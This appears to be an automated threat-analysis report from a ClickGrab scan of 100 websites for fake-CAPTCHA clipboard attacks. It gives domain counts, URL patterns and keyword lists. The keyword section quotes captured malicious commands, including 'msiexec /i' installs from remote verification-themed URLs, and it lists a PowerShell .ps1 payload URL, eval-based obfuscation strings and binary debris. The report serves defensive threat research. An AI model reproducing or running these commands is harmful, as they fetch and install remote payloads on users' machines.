ClickGrab Threat Analysis Report - 2026-05-16
Generated on 2026-05-16 01:52:58
Executive Summary
- Total sites analyzed: 100
- Sites with malicious content: 22
- Unique domains encountered: 2,053
- Total URLs extracted: 8,587
- PowerShell download attempts: 2
- Clipboard manipulation instances: 100
Domain Analysis
Most Frequently Encountered Domains
- bharatnamkeens.com: 405 occurrences
- baovechuyennghiep.baovengayvadem.com: 348 occurrences
- www.maheshwaree.com: 320 occurrences
- 98.70.13.131: 309 occurrences
- fudgeshop.com.au: 265 occurrences
- picsera.com: 226 occurrences
- 18.176.47.246: 218 occurrences
- adturekorea.co.kr: 214 occurrences
- scillarodriguez.com: 199 occurrences
- www.ccera-icar.org: 178 occurrences
- www.evodigital.com.au: 156 occurrences
- www.creatorssky.com: 156 occurrences
- devblog.ezeelogin.com: 126 occurrences
- www.dorper.com.au: 125 occurrences
- picsera.sirv.com: 121 occurrences
URL Pattern Analysis
reCAPTCHA imagery
11 occurrences across 8 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/recaptcha/api.js(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm(1 times)- ...and 3 more distinct URLs
Font resources
72 occurrences across 60 distinct URLs
https://fonts.gstatic.com(5 times)https://fonts.googleapis.com(3 times)https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620(2 times)https://use.fontawesome.com/releases/v5.6.3/css/all.css(2 times)- ...and 55 more distinct URLs
CDN hosted scripts
10 occurrences across 10 distinct URLs
https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js(1 times)https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/(1 times)https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8(1 times)- ...and 5 more distinct URLs
Google resources
134 occurrences across 75 distinct URLs
https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png(32 times)https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(13 times)https://www.googletagmanager.com/gtm.js?id=(4 times)https://fonts.googleapis.com(3 times)https://www.google(3 times)- ...and 70 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 529 (113 unique)
Keyword Categories
Social Engineering
46 unique keywords
captcha-jsexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";CAPTCHArobotcaptcha_word_new_402692CAPTCHA-logoVerificationVerification IDcommand = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";exec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;`- ...and 36 more
Obfuscation Indicators
11 unique keywords
eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")eval(eval("clearTimeout(timeIn"+uid+")")eval("clearTimeout(timeOut"+uid+")")eval(script)eval('var timeOut'+popupItems[i].id)eval(frameContents)Command for the linkW! Set the Show Command for the linkW Tell the link to resolve itselfWWW! Get the IconLocation for the linkW! Set the IconLocation for the linkW! Tell the link to save the changesW ISetupStringTable InterfaceWWW Get string from nameWW get_SuiteCallbackW put_SuiteCallbackW get_SuiteExtension put_SuiteExtensionI Command line argument passed to setup.exe when it's launched after rebootW* Set a shortcut property for an opened link7 Retrieve any failures from applying shortcut propertiesWWW0 Set a shortcut property for Run As AdministratorWW3 Retrieve shortcut property for Run As AdministratorWWW. Interface ISetupDynamicLinkedLibraryController InstallShield LogServices ClassWWW ISetupLogService Interface8 Opens the Log Database from the specified Storage objectWW: Creates a new Log Database on the specified Storage object* Opens the Log Database in a read-only mode ISetupLogService2 InterfaceWWW SetupMainWindow ClassW ISetupMainWindow Interface Window caption Window handleW Shows/Hides wait cursorWWW Create windowW Destroy window ISetupWindowText Interface property Color property TextWeval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)- ...and 1 more
System Commands
33 unique keywords
exec(exec() done(int) accept() reject() showExtension(bool) bool sizeGripEnabled modal L_yeX[eP[e l7ceb:e�Se@�eP|e�|e�eX7ce�S:ePQ:e j:e T:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePtePeeP`eP`e�p:eP`eee �Fe �Fe �Fe �Fe a:e�[:e�X:eP`e �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@ eP`e�`e��e �Fe �Fe �Fe �Fe �Fe`�He�W:e Q:e0Q:eQDialog::exec: Recursive call detected �7ce�w:e�Se@�eP|e�|e`�e �7cep�6e y6e �6e x:e�6ed{OeP�6ep{Oev{Oe|{Oe�{Oe �e�s:e�s:ePe`�6e�6e`�6e��6e �6e@�6eP`e��6eК6e �Fe �Fep�6e �Fe��6ep`e`�6eP`e �Fe��6e�6e��6e��6e��6e �Fe�ae�6e��6ep�6ep�6e �Fe �Fe �Fe �Fe �Fe`�He@�7e@�6e�x6e�9ep�6e�9e&Show this message again �7cep:e`�He�8ce��:e�Se@�eP|e�|e`�eL8ceP�Ne��Ne��Ne �:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePteP`eePePe�p:ePeee �Fe �Fe �Fe �Fe a:e�[:e�X:ePe �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@y:ePe�e��e �Fe �Fe �Fe �Fe �Fe�Hep�:e Q:e0Q:eshowMessage QString <p><b>%1</b></p>